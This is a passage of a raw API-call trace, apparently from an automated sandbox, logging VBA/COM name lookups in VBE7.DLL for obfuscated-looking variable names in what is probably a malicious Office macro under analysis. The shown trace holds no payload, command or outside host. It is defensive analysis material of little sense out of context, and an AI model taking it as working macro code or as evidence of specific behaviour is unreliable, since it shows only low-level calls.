_Dst=0x67c2d40) returned 0x0 [0069.783] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aACAGB") returned 0x105d35 [0069.783] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_aACAGB" | out: _Dst="_B_var_aACAGB") returned 0x0 [0069.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_aACAGB") returned 14 [0069.783] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.783] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aACAGB", lHashVal=0x105d35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.783] IUnknown:Release (This=0x665ba50) returned 0xd [0069.783] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.783] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aACAGB", lHashVal=0x105d35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.783] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.783] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.783] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aACAGB", lHashVal=0x105d35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.783] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.783] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.783] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aACAGB", lHashVal=0x105d35, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.783] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.783] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.783] IUnknown:Release (This=0x665ba50) returned 0xd [0069.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87133e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_aACAGB") returned 14 [0069.783] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aACAGB", lHashVal=0x105d35, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x47004100000000, pDummy=0x0) returned 0x0 [0069.783] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81f6a | out: _Dst=0x144ec0) returned 0x0 [0069.783] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zAAXUQ", lHashVal=0x100b6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f92, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zAAXUQ") returned 7 [0069.783] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zAAXUQ", lHashVal=0x100b6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f92, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zAAXUQ") returned 7 [0069.784] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zAAXUQ", lHashVal=0x100b6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zAAXUQ") returned 0x100b6d [0069.784] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zAAXUQ" | out: _Dst="zAAXUQ") returned 0x0 [0069.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zAAXUQ") returned 7 [0069.784] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.784] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zAAXUQ", lHashVal=0x100b6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.784] IUnknown:Release (This=0x665ba50) returned 0xd [0069.784] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.784] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zAAXUQ", lHashVal=0x100b6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.784] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.784] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.784] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zAAXUQ", lHashVal=0x100b6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.784] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.784] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.784] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zAAXUQ", lHashVal=0x100b6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.784] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81f92, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zAAXUQ") returned 7 [0069.784] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zAAXUQ", lHashVal=0x100b6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.784] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.784] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81f92 | out: _Dst=0x67c2d40) returned 0x0 [0069.784] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zAAXUQ") returned 0x108616 [0069.784] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zAAXUQ" | out: _Dst="_B_var_zAAXUQ") returned 0x0 [0069.784] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zAAXUQ") returned 14 [0069.784] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.784] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zAAXUQ", lHashVal=0x108616, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.784] IUnknown:Release (This=0x665ba50) returned 0xd [0069.784] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.785] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zAAXUQ", lHashVal=0x108616, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.785] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.785] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.785] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zAAXUQ", lHashVal=0x108616, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.785] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.785] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.785] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zAAXUQ", lHashVal=0x108616, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.785] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.785] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.785] IUnknown:Release (This=0x665ba50) returned 0xd [0069.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87136e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zAAXUQ") returned 14 [0069.785] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zAAXUQ", lHashVal=0x108616, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x55005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x55005800000000, pDummy=0x0) returned 0x0 [0069.785] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81f92 | out: _Dst=0x144ec0) returned 0x0 [0069.785] ITypeComp:RemoteBind (in: This=0x665ba60, szName="WXAQCwA4", lHashVal=0x10212b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81fba, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WXAQCwA4") returned 9 [0069.785] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="WXAQCwA4", lHashVal=0x10212b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81fba, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WXAQCwA4") returned 9 [0069.785] ITypeComp:RemoteBind (in: This=0x665bd30, szName="WXAQCwA4", lHashVal=0x10212b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.785] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="WXAQCwA4") returned 0x10212b [0069.785] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="WXAQCwA4" | out: _Dst="WXAQCwA4") returned 0x0 [0069.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="WXAQCwA4") returned 9 [0069.785] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.786] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="WXAQCwA4", lHashVal=0x10212b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.786] IUnknown:Release (This=0x665ba50) returned 0xd [0069.786] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.786] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="WXAQCwA4", lHashVal=0x10212b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.786] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.786] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.786] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="WXAQCwA4", lHashVal=0x10212b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.786] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.786] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.786] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="WXAQCwA4", lHashVal=0x10212b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.786] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81fba, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="WXAQCwA4") returned 9 [0069.786] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="WXAQCwA4", lHashVal=0x10212b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.786] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.786] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81fba | out: _Dst=0x67c2d40) returned 0x0 [0069.786] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_WXAQCwA4") returned 0x10f8f3 [0069.786] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_WXAQCwA4" | out: _Dst="_B_var_WXAQCwA4") returned 0x0 [0069.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_WXAQCwA4") returned 16 [0069.786] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.786] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_WXAQCwA4", lHashVal=0x10f8f3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.786] IUnknown:Release (This=0x665ba50) returned 0xd [0069.786] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.786] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_WXAQCwA4", lHashVal=0x10f8f3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.786] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.786] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.786] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_WXAQCwA4", lHashVal=0x10f8f3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.786] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.786] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.787] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_WXAQCwA4", lHashVal=0x10f8f3, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.787] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.787] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.787] IUnknown:Release (This=0x665ba50) returned 0xd [0069.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87139e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_WXAQCwA4") returned 16 [0069.787] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_WXAQCwA4", lHashVal=0x10f8f3, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x57005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0069.787] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81fba | out: _Dst=0x144ec0) returned 0x0 [0069.787] ITypeComp:RemoteBind (in: This=0x665ba60, szName="L_ZUAB", lHashVal=0x1021f9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81fe6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="L_ZUAB") returned 7 [0069.787] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="L_ZUAB", lHashVal=0x1021f9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81fe6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="L_ZUAB") returned 7 [0069.787] ITypeComp:RemoteBind (in: This=0x665bd30, szName="L_ZUAB", lHashVal=0x1021f9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.787] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="L_ZUAB") returned 0x1021f9 [0069.787] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="L_ZUAB" | out: _Dst="L_ZUAB") returned 0x0 [0069.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="L_ZUAB") returned 7 [0069.787] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.787] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="L_ZUAB", lHashVal=0x1021f9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.787] IUnknown:Release (This=0x665ba50) returned 0xd [0069.787] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.787] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="L_ZUAB", lHashVal=0x1021f9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.787] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.787] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.787] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="L_ZUAB", lHashVal=0x1021f9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.788] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.788] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.788] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="L_ZUAB", lHashVal=0x1021f9, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.788] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81fe6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="L_ZUAB") returned 7 [0069.788] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="L_ZUAB", lHashVal=0x1021f9, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.788] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.788] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81fe6 | out: _Dst=0x67c2d40) returned 0x0 [0069.788] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_L_ZUAB") returned 0x109ca2 [0069.788] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_L_ZUAB" | out: _Dst="_B_var_L_ZUAB") returned 0x0 [0069.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_L_ZUAB") returned 14 [0069.788] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.788] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_L_ZUAB", lHashVal=0x109ca2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.788] IUnknown:Release (This=0x665ba50) returned 0xd [0069.788] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.788] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_L_ZUAB", lHashVal=0x109ca2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.788] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.788] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.788] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_L_ZUAB", lHashVal=0x109ca2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.788] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.788] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.788] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_L_ZUAB", lHashVal=0x109ca2, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.788] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.788] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.788] IUnknown:Release (This=0x665ba50) returned 0xd [0069.788] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8713ce, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_L_ZUAB") returned 14 [0069.788] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_L_ZUAB", lHashVal=0x109ca2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4c005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.789] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81fe6 | out: _Dst=0x144ec0) returned 0x0 [0069.789] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.789] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.789] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.789] IUnknown:Release (This=0x665ba50) returned 0xd [0069.789] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.789] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.789] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.789] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.789] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.789] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.789] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.789] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.789] IUnknown:Release (This=0x665ba50) returned 0xd [0069.789] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.789] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.789] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, 